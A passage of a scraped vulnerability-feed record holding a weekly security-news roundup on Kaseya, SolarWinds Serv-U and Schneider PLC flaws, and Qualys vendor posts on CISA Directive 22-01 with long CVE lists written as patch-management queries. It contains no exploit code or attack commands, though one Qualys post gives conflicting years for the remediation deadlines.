Almost 10 days later the firm [has shipped new VSA version](<https://thehackernews.com/2021/07/kaseya-releases-patches-for-flaws.html>) with fixes for three security flaws (CVE-2021-30116 - Credentials leak and business logic flaw; CVE-2021-30119 - Cross-site scripting vulnerability; CVE-2021-30120 - Two-factor authentication bypass). The other 4 out of 7 vulnerabilities that could have been exploited in the attack were fixed earlier. Interestingly, REvil, the infamous ransomware cartel behind this attack, has [mysteriously disappeared from the dark web](<https://thehackernews.com/2021/07/revil-ransomware-gang-mysteriously.html>), leading to speculations that the criminal enterprise may have been taken down. Let's hope so.\n\nMost news sites over the past week have written about the use of [SolarWinds Zero-Day RCE (CVE-2021-35211) in targeted attacks](<https://www.microsoft.com/security/blog/2021/07/13/microsoft-discovers-threat-actor-targeting-solarwinds-serv-u-software-with-0-day-exploit/>). "A memory escape vulnerability in SolarWinds Serv-U Managed File Transfer Server. The flaw exists due to the way Serv-U has implemented the Secure Shell (SSH) protocol and can only be exploited if an organization has made the Serv-U SSH protocol externally accessible. Microsoft says that, if exploited, an attacker would be able to \u201cremotely run arbitrary code with privileges,\u201d which may include but is not limited to installing or executing malicious code, as well as accessing or altering data on the system". On July 13, Microsoft published a blog post providing additional insight into their discovery of the flaw and the exploitation activity associated with it. Over 8,000 systems remain publicly accessible and potentially vulnerable.\n\nAlso, news sites wrote a lot about [the dangers of Industrial and Utility Takeovers](<https://threatpost.com/unpatched-critical-rce-industrial-utility-takeovers/167751/>). 
"A critical remote code-execution (RCE) vulnerability in Schneider Electric programmable logic controllers (PLCs) has come to light (CVE-2021-22779), which allows unauthenticated cyberattackers to gain root-level control over PLCs used in manufacturing, building automation, healthcare and enterprise environments. Schneider has released a set of mitigations for the bug, but no full patch is available yet".\n\nSeveral large Security Bulletins have been published last week:\n\n * [Android Security Bulletin for July 2021](<https://blog.qualys.com/vulnerabilities-threat-research/2021/07/13/google-android-july-2021-security-patch-vulnerabilities-discover-and-take-remote-response-action-using-vmdr-for-mobile-devices>) addresses 44 vulnerabilities, out of which 7 are rated as critical vulnerabilities.\n * [Adobe Patches 11 Critical Bugs](<https://threatpost.com/adobe-patches-critical-acrobat/167743/>) in Popular Acrobat PDF Reader.\n * [Microsoft Patch Tuesday fixes 13 critical flaws](<https://www.welivesecurity.com/2021/07/14/microsoft-patch-tuesday-july>), including 4 under active attack. I have released [a separate video with an overview of these vulnerabilities](<https://avleonov.com/2021/07/15/vulristics-microsoft-patch-tuesday-july-2021-zero-days-eop-in-kernel-and-rce-in-scripting-engine-rces-in-kernel-dns-server-exchange-and-hyper-v/>) and recommend watching it.\n\nThere were some other interesting news that I would like to point out, but I do not want to make this episode too long. Therefore, I will do it very briefly.\n\n * [Google patches Chrome zero\u2011day](<https://www.welivesecurity.com/2021/07/16/google-patches-chrome-zero-day-vulnerability-exploited-in-the-wild>) vulnerability exploited in the wild (CVE-2021-30563). 
\n * [Critical Juniper Bug Allows DoS, RCE](<https://threatpost.com/critical-juniper-bug-dos-rce-carrier/167869/>) Against Carrier Networks (CVE-2021-0276, CVE-2021-0277).\n * [SonicWall has told users of two legacy products](<https://www.computerweekly.com/news/252504083/Legacy-SonicWall-kit-exploited-in-ransom-campaign>) running unpatched and end-of-life firmware to take immediate and urgent action to head off an \u201cimminent\u201d ransomware campaign.\n * [Attackers Exploited 4 Zero-Day Flaws](<https://www.darkreading.com/attacks-breaches/attackers-exploited-4-zero-day-flaws-in-chrome-safari-and-ie/d/d-id/1341542>) in Chrome, Safari & IE.\n * [CloudFlare CDNJS Bug Could Have Led to Widespread Supply-Chain Attacks](<https://thehackernews.com/2021/07/cloudflare-cdnjs-bug-could-have-led-to.html>). CDNJS is a free and open-source content delivery network (CDN) that serves about 4,041 JavaScript and CSS libraries.\n * Microsoft to beef up security portfolio with [reported half-billion-dollar RiskIQ buyout](<https://www.theregister.com/2021/07/13/microsoft_riskiq_acquisition/>). RiskIQ is all about using security intelligence to protect the attack surface of an enterprise. \n * Chinese makers of network software and hardware must [alert Beijing within two days of learning of a security vulnerability](<https://www.theregister.com/2021/07/15/china_vulnerability_law/>) in their products under rules coming into force in China this year. 
\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-07-19T16:29:00", "type": "avleonov", "title": "Last Week\u2019s Security news: Exploits for ForgeRock, vSphere, Apache Tomcat, new Print Spooler vuln, Kaseya Patch and REvil, SolarWinds, Schneider Electric, Bulletins", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-0277", "CVE-2021-35464", "CVE-2021-0276", "CVE-2021-22779", "CVE-2021-21985", "CVE-2021-30563", "CVE-2021-30119", "CVE-2018-11784", "CVE-2021-30116", "CVE-2021-35211", "CVE-2019-0221", "CVE-2021-30120"], "modified": "2021-07-19T16:29:00", "id": "AVLEONOV:C33EB29E3A78720B630607BECBB3CEF5", "href": "http://feedproxy.google.com/~r/avleonov/~3/gHnqqNZIYuo/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "qualysblog": [{"lastseen": "2021-11-09T06:36:02", "description": "[Start your VMDR 30-day, no-cost trial today](<https://www.qualys.com/forms/vmdr/>)\n\n## Overview\n\nOn November 3, 2021, the U.S. 
Cybersecurity and Infrastructure Security Agency (CISA) released a [Binding Operational Directive 22-01](<https://cyber.dhs.gov/bod/22-01/>), "Reducing the Significant Risk of Known Exploited Vulnerabilities." [This directive](<https://www.cisa.gov/news/2021/11/03/cisa-releases-directive-reducing-significant-risk-known-exploited-vulnerabilities>) recommends urgent and prioritized remediation of the vulnerabilities that adversaries are actively exploiting. It establishes a CISA-managed catalog of known exploited vulnerabilities that carry significant risk to the federal government and establishes requirements for agencies to remediate these vulnerabilities.\n\nThis directive requires agencies to review and update their internal vulnerability management procedures within 60 days and to remediate each vulnerability according to the timelines outlined in CISA's vulnerability catalog.\n\nQualys helps customers to identify and assess risk to organizations' digital infrastructure and automate remediation. Qualys' guidance for rapid response to the Operational Directive is below.\n\n## Directive Scope\n\nThis directive applies to all software and hardware found on federal information systems managed on agency premises or hosted by third parties on an agency's behalf.\n\nHowever, CISA strongly recommends that private businesses and state, local, tribal, and territorial (SLTT) governments prioritize the mitigation of vulnerabilities listed in CISA's public catalog.\n\n## CISA Catalog of Known Exploited Vulnerabilities\n\nIn total, CISA posted a list of [291 Common Vulnerabilities and Exposures (CVEs)](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) that pose the highest risk to federal agencies. The Qualys Research team has mapped all these CVEs to applicable QIDs. 
You can view the complete list of CVEs and the corresponding QIDs [here](<https://success.qualys.com/discussions/s/article/000006791>).\n\n### Not all vulnerabilities are created equal\n\nOur quick review of the 291 CVEs posted by CISA suggests that not all vulnerabilities hold the same priority. CISA has ordered U.S. federal enterprises to apply patches as soon as possible. The remediation guidance can be grouped into three distinct categories:\n\n#### Category 1 \u2013 Past Due\n\nRemediation of 15 CVEs (~5%) is already past due. These vulnerabilities include some of the most significant exploits in the recent past, including PrintNightmare, SigRed, ZeroLogon, and vulnerabilities in CryptoAPI, Pulse Secure, and more. Qualys Patch Management can help you remediate most of these vulnerabilities.\n\n#### Category 2 \u2013 Patch in less than two weeks\n\n100 vulnerabilities (34%) need to be patched in the next two weeks, or by **November 17, 2022**.\n\n#### Category 3 \u2013 Patch within six months\n\nThe remaining 176 vulnerabilities (60%) must be patched within the next six months, or by **May 3, 2022**.\n\n## Detect CISA's Vulnerabilities Using Qualys VMDR\n\nThe Qualys Research team has released several remote and authenticated detections (QIDs) for the vulnerabilities. 
Since the directive includes 291 CVEs, we recommend executing your search based on vulnerability criticality, release date, or other categories.\n\nFor example, to detect critical CVEs released in 2021:\n\n_vulnerabilities.vulnerability.criticality:CRITICAL and vulnerabilities.vulnerability.cveIds:[ `CVE-2021-1497`,`CVE-2021-1498`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-1782`,`CVE-2021-1870`,`CVE-2021-1871`,`CVE-2021-1879`,`CVE-2021-1905`,`CVE-2021-1906`,`CVE-2021-20016`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-21972`,`CVE-2021-21985`,`CVE-2021-22005`,`CVE-2021-22205`,`CVE-2021-22502`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-22986`,`CVE-2021-26084`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-27101`,`CVE-2021-27102`,`CVE-2021-27103`,`CVE-2021-27104`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-28663`,`CVE-2021-28664`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-30657`,`CVE-2021-30661`,`CVE-2021-30663`,`CVE-2021-30665`,`CVE-2021-30666`,`CVE-2021-30713`,`CVE-2021-30761`,`CVE-2021-30762`,`CVE-2021-30807`,`CVE-2021-30858`,`CVE-2021-30860`,`CVE-2021-30860`,`CVE-2021-30869`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40444`,`CVE-2021-40539`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42258` ]_\n\n\n\nUsing [Qualys 
VMDR](<https://www.qualys.com/subscriptions/vmdr/>), you can effectively prioritize those vulnerabilities using the VMDR Prioritization report.\n\n\n\nIn addition, you can locate a vulnerable host through Qualys Threat Protection by simply clicking on the impacted hosts to effectively identify and track this vulnerability.\n\n\n\nWith Qualys Unified Dashboard, you can track your exposure to the CISA Known Exploited Vulnerabilities and view your status and overall management in real-time. With trending enabled for dashboard widgets, you can keep track of the status of the vulnerabilities in your environment using the ["CISA 2010-21| KNOWN EXPLOITED VULNERABILITIES"](<https://success.qualys.com/support/s/article/000006791>) Dashboard.\n\n### Detailed Operational Dashboard:\n\n\n\n### Summary Dashboard High Level Structured by Vendor:\n\n\n\n## Remediation\n\nTo comply with this directive, federal agencies must remediate most "Category 2" vulnerabilities by **November 17, 2021**, and "Category 3" by May 3, 2021. Qualys Patch Management can help streamline the remediation of many of these vulnerabilities.\n\nCustomers can copy the following query into the Patch Management app to help comply with the directive's aggressive remediation date of November 17, 2021. 
Running this query will find all required patches and allow quick and efficient deployment of those missing patches to all assets directly from within the Qualys Cloud Platform.\n\ncve:[`CVE-2021-1497`,`CVE-2021-1498`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-1782`,`CVE-2021-1870`,`CVE-2021-1871`,`CVE-2021-1879`,`CVE-2021-1905`,`CVE-2021-1906`,`CVE-2021-20016`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-21972`,`CVE-2021-21985`,`CVE-2021-22005`,`CVE-2021-22205`,`CVE-2021-22502`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-22986`,`CVE-2021-26084`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-27101`,`CVE-2021-27102`,`CVE-2021-27103`,`CVE-2021-27104`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-28663`,`CVE-2021-28664`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-30657`,`CVE-2021-30661`,`CVE-2021-30663`,`CVE-2021-30665`,`CVE-2021-30666`,`CVE-2021-30713`,`CVE-2021-30761`,`CVE-2021-30762`,`CVE-2021-30807`,`CVE-2021-30858`,`CVE-2021-30860`,`CVE-2021-30860`,`CVE-2021-30869`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40444`,`CVE-2021-40539`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42258` ]\n\n\n\nQualys patch content covers many Microsoft, Linux, and third-party applications; however, some of the vulnerabilities introduced by CISA are not 
currently supported out-of-the-box by Qualys. To remediate those vulnerabilities, Qualys provides the ability to deploy custom patches. The flexibility to customize patch deployment allows customers to patch the remaining CVEs in this list.\n\nNote that the due date for \u201cCategory 1\u201d patches has already passed. To find missing patches in your environment for \u201cCategory 1\u201d past due CVEs, copy the following query into the Patch Management app:\n\ncve:['CVE-2021-1732','CVE-2020-1350','CVE-2020-1472','CVE-2021-26855','CVE-2021-26858','CVE-2021-27065','CVE-2020-0601','CVE-2021-26857','CVE-2021-22893','CVE-2020-8243','CVE-2021-22900','CVE-2021-22894','CVE-2020-8260','CVE-2021-22899','CVE-2019-11510']\n\n\n\n## Federal Enterprises and Agencies Can Act Now\n\nFor federal enterprises and agencies, it's a race against time to remediate these vulnerabilities across their respective environments and achieve compliance with this binding directive. Qualys solutions can help achieve that compliance. Qualys Cloud Platform is FedRAMP authorized, with [107 FedRAMP authorizations](<https://marketplace.fedramp.gov/#!/product/qualys-cloud-platform?sort=-authorizations>).\n\nHere are a few steps Federal enterprises can take immediately:\n\n * Run vulnerability assessments against all your assets by leveraging various sensors such as Qualys agent, scanners, and more\n * Prioritize remediation by due dates\n * Identify all vulnerable assets automatically mapped into the threat feed\n * Use Patch Management to apply patches and other configuration changes\n * Track remediation progress through Unified Dashboards\n\n## Summary\n\nUnderstanding vulnerabilities is a critical but only partial step in threat mitigation. Qualys VMDR helps customers discover, assess threats, assign risk, and remediate threats in one solution. 
Qualys customers rely on the accuracy of Qualys' threat intelligence to protect their digital environments and stay current with patch guidance. Using Qualys VMDR can help any organization efficiently respond to the CISA directive.\n\n## Getting Started\n\nLearn how [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>) provides actionable vulnerability guidance and automates remediation in one solution. Ready to get started? Sign up for a 30-day, no-cost [VMDR trial](<https://www.qualys.com/forms/vmdr/>).", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-11-09T06:15:01", "type": "qualysblog", "title": "Qualys Response to CISA Alert: Binding Operational Directive 22-01", "bulletinFamily": "blog", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2020-0601", "CVE-2020-1350", "CVE-2020-1472", "CVE-2020-8243", "CVE-2020-8260", "CVE-2021-1497", "CVE-2021-1498", "CVE-2021-1647", "CVE-2021-1675", "CVE-2021-1732", "CVE-2021-1782", "CVE-2021-1870", "CVE-2021-1871", "CVE-2021-1879", "CVE-2021-1905", "CVE-2021-1906", "CVE-2021-20016", "CVE-2021-21017", "CVE-2021-21148", "CVE-2021-21166", "CVE-2021-21193", 
"CVE-2021-21206", "CVE-2021-21220", "CVE-2021-21224", "CVE-2021-21972", "CVE-2021-21985", "CVE-2021-22005", "CVE-2021-22205", "CVE-2021-22502", "CVE-2021-22893", "CVE-2021-22894", "CVE-2021-22899", "CVE-2021-22900", "CVE-2021-22986", "CVE-2021-26084", "CVE-2021-26411", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-27059", "CVE-2021-27065", "CVE-2021-27085", "CVE-2021-27101", "CVE-2021-27102", "CVE-2021-27103", "CVE-2021-27104", "CVE-2021-28310", "CVE-2021-28550", "CVE-2021-28663", "CVE-2021-28664", "CVE-2021-30116", "CVE-2021-30551", "CVE-2021-30554", "CVE-2021-30563", "CVE-2021-30632", "CVE-2021-30633", "CVE-2021-30657", "CVE-2021-30661", "CVE-2021-30663", "CVE-2021-30665", "CVE-2021-30666", "CVE-2021-30713", "CVE-2021-30761", "CVE-2021-30762", "CVE-2021-30807", "CVE-2021-30858", "CVE-2021-30860", "CVE-2021-30869", "CVE-2021-31199", "CVE-2021-31201", "CVE-2021-31207", "CVE-2021-31955", "CVE-2021-31956", "CVE-2021-31979", "CVE-2021-33739", "CVE-2021-33742", "CVE-2021-33771", "CVE-2021-34448", "CVE-2021-34473", "CVE-2021-34523", "CVE-2021-34527", "CVE-2021-35211", "CVE-2021-36741", "CVE-2021-36742", "CVE-2021-36942", "CVE-2021-36948", "CVE-2021-36955", "CVE-2021-37973", "CVE-2021-37975", "CVE-2021-37976", "CVE-2021-38000", "CVE-2021-38003", "CVE-2021-38645", "CVE-2021-38647", "CVE-2021-38648", "CVE-2021-38649", "CVE-2021-40444", "CVE-2021-40539", "CVE-2021-41773", "CVE-2021-42013", "CVE-2021-42258"], "modified": "2021-11-09T06:15:01", "id": "QUALYSBLOG:BC22CE22A3E70823D5F0E944CBD5CE4A", "href": "https://blog.qualys.com/category/vulnerabilities-threat-research", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-25T19:27:09", "description": "_CISA released a directive in November 2021, recommending urgent and prioritized remediation of actively exploited vulnerabilities. Both government agencies and corporations should heed this advice. 
This blog outlines how Qualys Vulnerability Management, Detection & Response can be used by any organization to respond to this directive efficiently and effectively._\n\n### Situation\n\nIn November 2021, the U.S. Cybersecurity and Infrastructure Security Agency (CISA) released a [Binding Operational Directive 22-01](<https://cyber.dhs.gov/bod/22-01/>) called \u201cReducing the Significant Risk of Known Exploited Vulnerabilities.\u201d [This directive](<https://www.cisa.gov/news/2021/11/03/cisa-releases-directive-reducing-significant-risk-known-exploited-vulnerabilities>) recommends urgent and prioritized remediation of the vulnerabilities that adversaries are actively exploiting. It establishes a CISA-managed catalog of Known Exploited Vulnerabilities that carry significant risk to the federal government and sets requirements for agencies to remediate these vulnerabilities.\n\nThis directive requires federal agencies to review and update internal vulnerability management procedures to remediate each vulnerability according to the timelines outlined in CISA\u2019s vulnerability catalog.\n\n### Directive Scope\n\nThis CISA directive applies to all software and hardware found on federal information systems managed on agency premises or hosted by third parties on an agency\u2019s behalf.\n\nHowever, CISA strongly recommends that public and private businesses as well as state, local, tribal, and territorial (SLTT) governments prioritize the mitigation of vulnerabilities listed in CISA\u2019s public catalog. This is truly vulnerability management guidance for all organizations to heed.\n\n### CISA Catalog of Known Exploited Vulnerabilities\n\nIn total, CISA posted a list of [379 Common Vulnerabilities and Exposures (CVEs)](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) that pose the highest risk to federal agencies. 
CISA\u2019s most recent update was issued on February 22, 2022.\n\nThe Qualys Research team continuously maps CVEs to available QIDs (Qualys vulnerability identifiers) in the Qualys Knowledgebase, tagging them with the RTI field \u201cCISA Exploited\u201d. This is an ongoing effort, as CISA frequently adds the latest CVEs as part of its regular feeds.\n\nOut of these vulnerabilities, Directive 22-01 urges all organizations to reduce their exposure to cyberattacks by effectively prioritizing the remediation of the identified vulnerabilities.\n\nCISA has ordered U.S. federal agencies to apply patches as soon as possible. The remediation guidance is grouped into multiple categories by CISA based on attack surface severity and time-to-remediate. The timelines are available in the [Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>) for each of the CVEs.\n\n### Detect CISA Vulnerabilities Using Qualys VMDR\n\nQualys helps customers to identify and assess the risk to their organizations\u2019 digital infrastructure, and then to automate remediation. Qualys\u2019 guidance for rapid response to Directive 22-01 follows.\n\nThe Qualys Research team has released multiple remote and authenticated detections (QIDs) for these vulnerabilities. Since the directive includes 379 CVEs (as of February 22, 2022), we recommend executing your search based on QQL (Qualys Query Language), as shown here for the QIDs released by Qualys: **_vulnerabilities.vulnerability.threatIntel.cisaKnownExploitedVulns:"true"_**\n\n\n\n### CISA Exploited RTI\n\nUsing [Qualys VMDR](<https://www.qualys.com/subscriptions/vmdr/>), you can effectively prioritize those vulnerabilities using VMDR Prioritization. 
Qualys has introduced an **RTI Category, CISA Exploited**.\n\nThis RTI indicates that the vulnerabilities are associated with the CISA catalog.\n\n\n\nIn addition, you can locate vulnerable hosts through Qualys Threat Protection by simply clicking on the impacted hosts to identify and track these vulnerabilities.\n\n\n\nWith Qualys Unified Dashboard, you can track your exposure to CISA Known Exploited Vulnerabilities, along with your remediation status and overall management, in real time. With dashboard widgets, you can keep track of the status of vulnerabilities in your environment using the [\u201cCISA 2010-21| KNOWN EXPLOITED VULNERABILITIES\u201d](<https://success.qualys.com/support/s/article/000006791>) Dashboard.\n\n### Detailed Operational Dashboard\n\n\n\n### Remediation\n\nTo comply with this directive, federal agencies need to remediate all vulnerabilities according to the remediation timelines set in the [CISA Catalog](<https://www.cisa.gov/known-exploited-vulnerabilities-catalog>).\n\nQualys patch content covers many Microsoft, Linux, and third-party applications. However, patches for some of the vulnerabilities listed by CISA are not currently supported out-of-the-box by Qualys. To remediate those vulnerabilities, Qualys provides the ability to deploy custom patches. The flexibility to customize patch deployment allows customers to patch all the remaining CVEs in their list.\n\nCustomers can copy the following query into the Patch Management app to help meet the directive\u2019s aggressive remediation timelines set by CISA. 
Running this query for specific CVEs will find required patches and allow quick and efficient deployment of those missing patches to all assets directly from within Qualys Cloud Platform.\n \n \n cve:[`CVE-2010-5326`,`CVE-2012-0158`,`CVE-2012-0391`,`CVE-2012-3152`,`CVE-2013-3900`,`CVE-2013-3906`,`CVE-2014-1761`,`CVE-2014-1776`,`CVE-2014-1812`,`CVE-2015-1635`,`CVE-2015-1641`,`CVE-2015-4852`,`CVE-2016-0167`,`CVE-2016-0185`,`CVE-2016-3088`,`CVE-2016-3235`,`CVE-2016-3643`,`CVE-2016-3976`,`CVE-2016-7255`,`CVE-2016-9563`,`CVE-2017-0143`,`CVE-2017-0144`,`CVE-2017-0145`,`CVE-2017-0199`,`CVE-2017-0262`,`CVE-2017-0263`,`CVE-2017-10271`,`CVE-2017-11774`,`CVE-2017-11882`,`CVE-2017-5638`,`CVE-2017-5689`,`CVE-2017-6327`,`CVE-2017-7269`,`CVE-2017-8464`,`CVE-2017-8759`,`CVE-2017-9791`,`CVE-2017-9805`,`CVE-2017-9841`,`CVE-2018-0798`,`CVE-2018-0802`,`CVE-2018-1000861`,`CVE-2018-11776`,`CVE-2018-15961`,`CVE-2018-15982`,`CVE-2018-2380`,`CVE-2018-4878`,`CVE-2018-4939`,`CVE-2018-6789`,`CVE-2018-7600`,`CVE-2018-8174`,`CVE-2018-8453`,`CVE-2018-8653`,`CVE-2019-0193`,`CVE-2019-0211`,`CVE-2019-0541`,`CVE-2019-0604`,`CVE-2019-0708`,`CVE-2019-0752`,`CVE-2019-0797`,`CVE-2019-0803`,`CVE-2019-0808`,`CVE-2019-0859`,`CVE-2019-0863`,`CVE-2019-10149`,`CVE-2019-10758`,`CVE-2019-11510`,`CVE-2019-11539`,`CVE-2019-1214`,`CVE-2019-1215`,`CVE-2019-1367`,`CVE-2019-1429`,`CVE-2019-1458`,`CVE-2019-16759`,`CVE-2019-17026`,`CVE-2019-17558`,`CVE-2019-18187`,`CVE-2019-18988`,`CVE-2019-2725`,`CVE-2019-8394`,`CVE-2019-9978`,`CVE-2020-0601`,`CVE-2020-0646`,`CVE-2020-0674`,`CVE-2020-0683`,`CVE-2020-0688`,`CVE-2020-0787`,`CVE-2020-0796`,`CVE-2020-0878`,`CVE-2020-0938`,`CVE-2020-0968`,`CVE-2020-0986`,`CVE-2020-10148`,`CVE-2020-10189`,`CVE-2020-1020`,`CVE-2020-1040`,`CVE-2020-1054`,`CVE-2020-1147`,`CVE-2020-11738`,`CVE-2020-11978`,`CVE-2020-1350`,`CVE-2020-13671`,`CVE-2020-1380`,`CVE-2020-13927`,`CVE-2020-1464`,`CVE-2020-1472`,`CVE-2020-14750`,`CVE-2020-14871`,`CVE-2020-14882`,`CVE-2020-14883`,`CVE-2020-15505`,`CVE-2020-
15999`,`CVE-2020-16009`,`CVE-2020-16010`,`CVE-2020-16013`,`CVE-2020-16017`,`CVE-2020-17087`,`CVE-2020-17144`,`CVE-2020-17496`,`CVE-2020-17530`,`CVE-2020-24557`,`CVE-2020-25213`,`CVE-2020-2555`,`CVE-2020-6207`,`CVE-2020-6287`,`CVE-2020-6418`,`CVE-2020-6572`,`CVE-2020-6819`,`CVE-2020-6820`,`CVE-2020-8243`,`CVE-2020-8260`,`CVE-2020-8467`,`CVE-2020-8468`,`CVE-2020-8599`,`CVE-2021-1647`,`CVE-2021-1675`,`CVE-2021-1732`,`CVE-2021-21017`,`CVE-2021-21148`,`CVE-2021-21166`,`CVE-2021-21193`,`CVE-2021-21206`,`CVE-2021-21220`,`CVE-2021-21224`,`CVE-2021-22204`,`CVE-2021-22893`,`CVE-2021-22894`,`CVE-2021-22899`,`CVE-2021-22900`,`CVE-2021-26411`,`CVE-2021-26855`,`CVE-2021-26857`,`CVE-2021-26858`,`CVE-2021-27059`,`CVE-2021-27065`,`CVE-2021-27085`,`CVE-2021-28310`,`CVE-2021-28550`,`CVE-2021-30116`,`CVE-2021-30551`,`CVE-2021-30554`,`CVE-2021-30563`,`CVE-2021-30632`,`CVE-2021-30633`,`CVE-2021-31199`,`CVE-2021-31201`,`CVE-2021-31207`,`CVE-2021-31955`,`CVE-2021-31956`,`CVE-2021-31979`,`CVE-2021-33739`,`CVE-2021-33742`,`CVE-2021-33766`,`CVE-2021-33771`,`CVE-2021-34448`,`CVE-2021-34473`,`CVE-2021-34523`,`CVE-2021-34527`,`CVE-2021-35211`,`CVE-2021-35247`,`CVE-2021-36741`,`CVE-2021-36742`,`CVE-2021-36934`,`CVE-2021-36942`,`CVE-2021-36948`,`CVE-2021-36955`,`CVE-2021-37415`,`CVE-2021-37973`,`CVE-2021-37975`,`CVE-2021-37976`,`CVE-2021-38000`,`CVE-2021-38003`,`CVE-2021-38645`,`CVE-2021-38647`,`CVE-2021-38648`,`CVE-2021-38649`,`CVE-2021-40438`,`CVE-2021-40444`,`CVE-2021-40449`,`CVE-2021-40539`,`CVE-2021-4102`,`CVE-2021-41773`,`CVE-2021-42013`,`CVE-2021-42292`,`CVE-2021-42321`,`CVE-2021-43890`,`CVE-2021-44077`,`CVE-2021-44228`,`CVE-2021-44515`,`CVE-2022-0609`,`CVE-2022-21882`,`CVE-2022-24086`,`CVE-2010-1871`,`CVE-2017-12149`,`CVE-2019-13272` ]\n\n\n\nVulnerabilities can be validated through VMDR and a Patch Job can be configured for vulnerable assets.\n\n\n\n### Federal Enterprises and Agencies Can Act Now\n\nFor federal agencies and enterprises, it\u2019s a race against time to remediate these 
